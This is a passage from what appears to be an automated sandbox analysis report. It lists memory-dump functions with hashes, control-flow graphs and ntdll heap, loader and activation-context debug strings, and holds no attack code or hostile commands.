                                                                  • Opcode ID: 69326ecf76d29b7752e475b5fc8c90d86b3dac5a8afd0e39de9d9a78439cc1bd
                                                                  • Instruction ID: f8bf895f777140723d7ec9f761de49f217da17a5a88fee7f02c00278c2f48d41
                                                                  • Opcode Fuzzy Hash: 69326ecf76d29b7752e475b5fc8c90d86b3dac5a8afd0e39de9d9a78439cc1bd
                                                                  • Instruction Fuzzy Hash: 6F90027120544862D54071584904A46001547E0305F51C816A0054694ED6358D9DBA61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2BE0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b89935d2fe8655132ce30412663009490bb4e8dd4a7920940f48da6fac429183
                                                                  • Instruction ID: 450eb11adc450e63517e780770ae9804f905e4ee615e11c9deb3f65a088de2da
                                                                  • Opcode Fuzzy Hash: b89935d2fe8655132ce30412663009490bb4e8dd4a7920940f48da6fac429183
                                                                  • Instruction Fuzzy Hash: 0690026160540422D54071585918706001547E0301F51D816A0014554EC6698A9D7AA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2BC0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af8c31e70ad6712de37e0e4bdc4de4e380b1aeff8d8b3c6525a472171bd51723
                                                                  • Instruction ID: 9ff296543055c158a19027cbb2707a1790443171548c3a4e5ad44c6588a3c7d6
                                                                  • Opcode Fuzzy Hash: af8c31e70ad6712de37e0e4bdc4de4e380b1aeff8d8b3c6525a472171bd51723
                                                                  • Instruction Fuzzy Hash: E490027120140422D50065985908646000547F0301F51D816A5014555FC67588D97531
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2B80 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bde641b66bd7de3a1347ca3b2233a7818919fd0d03a7d8c8e2e5d130ef017d42
                                                                  • Instruction ID: beb0e3e638e4303f9d3c8297ccf69b9a1d0dd9602133d2685bfbf283bbfd1e35
                                                                  • Opcode Fuzzy Hash: bde641b66bd7de3a1347ca3b2233a7818919fd0d03a7d8c8e2e5d130ef017d42
                                                                  • Instruction Fuzzy Hash: 5990027120140862D50061584904B46000547F0301F51C81BA0114654EC625C8997921
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2A10 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 71de9cd57dc8e6382f952c4f23bc05c7b0b20f3670a9e79b57ab9ef2181043b8
                                                                  • Instruction ID: 86fcc8c446411a0a4fa920a02ad4be07a757071ddab9e6b5335260118a48265a
                                                                  • Opcode Fuzzy Hash: 71de9cd57dc8e6382f952c4f23bc05c7b0b20f3670a9e79b57ab9ef2181043b8
                                                                  • Instruction Fuzzy Hash: 16900265221400220545A5580B0450B044557E6351391C81AF1406590DC63188AD7721
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2AC0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f6091dc99506269e8d86a1a2719172fa086e7106ceb0e2e5d78f3a06659d9fa
                                                                  • Instruction ID: edc9a196841da77c5e40763d276d1012d741e56db4551ebabf3eba2571bcc1f0
                                                                  • Opcode Fuzzy Hash: 2f6091dc99506269e8d86a1a2719172fa086e7106ceb0e2e5d78f3a06659d9fa
                                                                  • Instruction Fuzzy Hash: 0D90027160540822D55071584914746000547E0301F51C816A0014654EC7658A9D7AA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2AA0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f9bb54599e01294a373390f6f5a319121121d51f180117022c6485c972e1b954
                                                                  • Instruction ID: 342bb69b1edcd2eee770f7e0a492522262e2aed5cff37575a7a49ae1dea9da5b
                                                                  • Opcode Fuzzy Hash: f9bb54599e01294a373390f6f5a319121121d51f180117022c6485c972e1b954
                                                                  • Instruction Fuzzy Hash: 8E90027120140822D50461584D04686000547E0301F51C816A6014655FD67588D97531
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2A80 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d47cfc133dc0c578a83669eaac935c004e1a2103f0c715871fd71c520b8ea4cf
                                                                  • Instruction ID: c0785cf638467631b7f576b3115783fee2a73ed1db23c10674930d280594f910
                                                                  • Opcode Fuzzy Hash: d47cfc133dc0c578a83669eaac935c004e1a2103f0c715871fd71c520b8ea4cf
                                                                  • Instruction Fuzzy Hash: 699002A120240023450571584914616400A47F0301B51C826E1004590EC53588D97525
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F29F0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c8de9063b2a4ac2881c56bfd92efc0231ba61f5a91bcd3ebfc6122ede13a5c2
                                                                  • Instruction ID: d730fa83938fcd0f1a33e6acafb6c433519f639b18344428b9d7748035b16666
                                                                  • Opcode Fuzzy Hash: 9c8de9063b2a4ac2881c56bfd92efc0231ba61f5a91bcd3ebfc6122ede13a5c2
                                                                  • Instruction Fuzzy Hash: A9900265211400230505A5580B04507004647E5351351C826F1005550DD63188A97521
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F29D0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58dd445e985050dafa837541db2bf621d139b8eee39f135590f8120bd6904f38
                                                                  • Instruction ID: b55763bfcbce87a14e0603355fea6fed924229a2248ecfd19545860582e9f0e3
                                                                  • Opcode Fuzzy Hash: 58dd445e985050dafa837541db2bf621d139b8eee39f135590f8120bd6904f38
                                                                  • Instruction Fuzzy Hash: 5E9002E1201540B24900A2588904B0A450547F0301B51C81BE1044560DC5358899B535
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F38D0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9600ed1e23b29248c250e2035e5895c9dcaecec783fec25773e3532878412a0b
                                                                  • Instruction ID: 932369b93733644b233bfa9e852728b301dc102df9f10a68a8bb75c00a8a09d7
                                                                  • Opcode Fuzzy Hash: 9600ed1e23b29248c250e2035e5895c9dcaecec783fec25773e3532878412a0b
                                                                  • Instruction Fuzzy Hash: 9790026124545122D550715C4904616400567F0301F51C826A0804594EC565889D7621
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F2B20 Relevance: .0, Instructions: 2COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction ID: be3bca9046aa1b18a19a8dd4c4032d3f5ab63f83187abed30f9eaeaee1dadc80
                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction Fuzzy Hash:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3788A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1016 3788a1f0-3788a269 call 377c2330 * 2 RtlDebugPrintTimes 1022 3788a41f-3788a444 call 377c24d0 * 2 call 377f4b50 1016->1022 1023 3788a26f-3788a27a 1016->1023 1025 3788a27c-3788a289 1023->1025 1026 3788a2a4 1023->1026 1028 3788a28b-3788a28d 1025->1028 1029 3788a28f-3788a295 1025->1029 1030 3788a2a8-3788a2b4 1026->1030 1028->1029 1032 3788a29b-3788a2a2 1029->1032 1033 3788a373-3788a375 1029->1033 1034 3788a2c1-3788a2c3 1030->1034 1032->1030 1036 3788a39f-3788a3a1 1033->1036 1037 3788a2c5-3788a2c7 1034->1037 1038 3788a2b6-3788a2bc 1034->1038 1039 3788a2d5-3788a2fd RtlDebugPrintTimes 1036->1039 1040 3788a3a7-3788a3b4 1036->1040 1037->1036 1042 3788a2cc-3788a2d0 1038->1042 1043 3788a2be 1038->1043 1039->1022 1052 3788a303-3788a320 RtlDebugPrintTimes 1039->1052 1044 3788a3da-3788a3e6 1040->1044 1045 3788a3b6-3788a3c3 1040->1045 1047 3788a3ec-3788a3ee 1042->1047 1043->1034 1051 3788a3fb-3788a3fd 1044->1051 1049 3788a3cb-3788a3d1 1045->1049 1050 3788a3c5-3788a3c9 1045->1050 1047->1036 1053 3788a4eb-3788a4ed 1049->1053 1054 3788a3d7 1049->1054 1050->1049 1055 3788a3ff-3788a401 1051->1055 1056 3788a3f0-3788a3f6 1051->1056 1052->1022 1064 3788a326-3788a34c RtlDebugPrintTimes 1052->1064 1057 3788a403-3788a409 1053->1057 1054->1044 1055->1057 1058 3788a3f8 1056->1058 1059 3788a447-3788a44b 1056->1059 1062 3788a40b-3788a41d RtlDebugPrintTimes 1057->1062 1063 3788a450-3788a474 RtlDebugPrintTimes 1057->1063 1058->1051 1061 3788a51f-3788a521 1059->1061 1062->1022 1063->1022 1068 3788a476-3788a493 RtlDebugPrintTimes 1063->1068 1064->1022 1069 3788a352-3788a354 1064->1069 1068->1022 1073 3788a495-3788a4c4 RtlDebugPrintTimes 1068->1073 1070 3788a356-3788a363 1069->1070 1071 3788a377-3788a38a 1069->1071 1074 3788a36b-3788a371 1070->1074 1075 3788a365-3788a369 1070->1075 1076 3788a397-3788a399 1071->1076 1073->1022 1082 3788a4ca-3788a4cc 1073->1082 1074->1033 1074->1071 1075->1074 1077 3788a39b-3788a39d 1076->1077 1078 3788a38c-3788a392 1076->1078 1077->1036 1080 3788a3e8-3788a3ea 1078->1080 1081 3788a394 1078->1081 1080->1047 1081->1076 1083 3788a4ce-3788a4db 1082->1083 1084 3788a4f2-3788a505 1082->1084 1085 3788a4dd-3788a4e1 1083->1085 1086 3788a4e3-3788a4e9 1083->1086 1087 3788a512-3788a514 1084->1087 1085->1086 1086->1053 1086->1084 1088 3788a516 1087->1088 1089 3788a507-3788a50d 1087->1089 1088->1055 1090 3788a51b-3788a51d 1089->1090 1091 3788a50f 1089->1091 1090->1061 1091->1087
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: HEAP:
                                                                  • API String ID: 3446177414-2466845122
                                                                  • Opcode ID: 14675e284eca230194efc805c4cb122905ae878068175831b73edd2cfc64f4b2
                                                                  • Instruction ID: 1c9a561723c0f06dab8956c21aab42ea181993c07a5bfd15f93471b1fe551135
                                                                  • Opcode Fuzzy Hash: 14675e284eca230194efc805c4cb122905ae878068175831b73edd2cfc64f4b2
                                                                  • Instruction Fuzzy Hash: E8A19D756043119FDB04CE18C8D4A6ABBE5FF98360F08452DE945DB391EB74EC46CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1092 377e7550-377e7571 1093 377e75ab-377e75b9 call 377f4b50 1092->1093 1094 377e7573-377e758f call 377be580 1092->1094 1099 37824443 1094->1099 1100 377e7595-377e75a2 1094->1100 1103 3782444a-37824450 1099->1103 1101 377e75ba-377e75c9 call 377e7738 1100->1101 1102 377e75a4 1100->1102 1110 377e75cb-377e75e1 call 377e76ed 1101->1110 1111 377e7621-377e762a 1101->1111 1102->1093 1105 37824456-378244c3 call 3783ef10 call 377f8f40 RtlDebugPrintTimes BaseQueryModuleData 1103->1105 1106 377e75e7-377e75f0 call 377e7648 1103->1106 1105->1106 1124 378244c9-378244d1 1105->1124 1106->1111 1117 377e75f2 1106->1117 1110->1103 1110->1106 1115 377e75f8-377e7601 1111->1115 1119 377e762c-377e762e 1115->1119 1120 377e7603-377e7612 call 377e763b 1115->1120 1117->1115 1123 377e7614-377e7616 1119->1123 1120->1123 1126 377e7618-377e761a 1123->1126 1127 377e7630-377e7639 1123->1127 1124->1106 1128 378244d7-378244de 1124->1128 1126->1102 1129 377e761c 1126->1129 1127->1126 1128->1106 1130 378244e4-378244ef 1128->1130 1131 378245c9-378245db call 377f2b70 1129->1131 1133 378245c4 call 377f4c68 1130->1133 1134 378244f5-3782452e call 3783ef10 call 377fa9c0 1130->1134 1131->1102 1133->1131 1141 37824530-37824541 call 3783ef10 1134->1141 1142 37824546-37824576 call 3783ef10 1134->1142 1141->1111 1142->1106 1147 3782457c-3782458a call 377fa690 1142->1147 1150 37824591-378245ae call 3783ef10 call 3782cc1e 1147->1150 1151 3782458c-3782458e 1147->1151 1150->1106 1156 378245b4-378245bd 1150->1156 1151->1150 1156->1147 1157 378245bf 1156->1157 1157->1106
                                                                  Strings
                                                                  • ExecuteOptions, xrefs: 378244AB
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37824460
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37824530
                                                                  • Execute=1, xrefs: 3782451E
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 37824507
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 37824592
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3782454D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 040b0b3f378bd5c67e941ac432586b6f194975bb7306665d28247d645c937adf
                                                                  • Instruction ID: 1095e633f181c9528f5f616f6623deb0087714e8c8e4a1d48a8a0b03803ea7c3
                                                                  • Opcode Fuzzy Hash: 040b0b3f378bd5c67e941ac432586b6f194975bb7306665d28247d645c937adf
                                                                  • Instruction Fuzzy Hash: 86510975A012197AEB109E98EC89FE973ADEF18354F4004EDD505AF580EB74AE41CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377CA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37817807
                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 378178F3
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 378177E2
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 378177DD, 37817802
                                                                  • SsHd, xrefs: 377CA304
                                                                  • Actx , xrefs: 37817819, 37817880
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                  • API String ID: 0-1988757188
                                                                  • Opcode ID: e156ebe9f243bd1f4737545cded89af743b575b537b7a78ccb94a9d792893726
                                                                  • Instruction ID: a4c6340a297303661288b7ea41b6aefdd3fc935e05cb09aee53b3e63f5e6e2b5
                                                                  • Opcode Fuzzy Hash: e156ebe9f243bd1f4737545cded89af743b575b537b7a78ccb94a9d792893726
                                                                  • Instruction Fuzzy Hash: 08E1C3746043028FE715CF68C8D4B2A77E2BB89365F524A2DF965CF290DB31E945CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377CD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37819178
                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37819372
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37819153
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3781914E, 37819173
                                                                  • GsHd, xrefs: 377CD794
                                                                  • Actx , xrefs: 37819315
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                  • API String ID: 3446177414-2196497285
                                                                  • Opcode ID: 446793db2550407c405a2cc53c8f1b753f754c3b426e1353b548dbd95c97e81e
                                                                  • Instruction ID: edc630b46115ecc29652d5ac21a687891a71f59f3452dd5714f27d5614c16b56
                                                                  • Opcode Fuzzy Hash: 446793db2550407c405a2cc53c8f1b753f754c3b426e1353b548dbd95c97e81e
                                                                  • Instruction Fuzzy Hash: 76E1D0746043429FE710CF14C980B5BB7E5BF98368F404A6DE896EF281D771E885CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3785F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                  • API String ID: 3446177414-1745908468
                                                                  • Opcode ID: df8407cf2d83a5f1358c4a3840422242bd406f9bfe929f83a3acd155eff11b4b
                                                                  • Instruction ID: e9d2d328e319e2b5a022d48e275208e20a6d1a475d66753e3789c506ddb2f497
                                                                  • Opcode Fuzzy Hash: df8407cf2d83a5f1358c4a3840422242bd406f9bfe929f83a3acd155eff11b4b
                                                                  • Instruction Fuzzy Hash: 4A91EF79901648EFEB42CFA8C444BEDBBF2FF69360F148199E445AB251CB39A941CF11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3782FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                  • API String ID: 3446177414-4227709934
                                                                  • Opcode ID: 8bae675bf55cf912d9508f6fde1b25ff658ea1ceb2952bbe5899c64c3e891da3
                                                                  • Instruction ID: f9030d7fada6cf08e0c857fa6040ba7e1ad0565b64bb466d2236d517d17c6e44
                                                                  • Opcode Fuzzy Hash: 8bae675bf55cf912d9508f6fde1b25ff658ea1ceb2952bbe5899c64c3e891da3
                                                                  • Instruction Fuzzy Hash: 88417FB5A01209EFDB01CF99C885AEEBBB5FF58365F100069E905B7340D735AE91EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3785F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
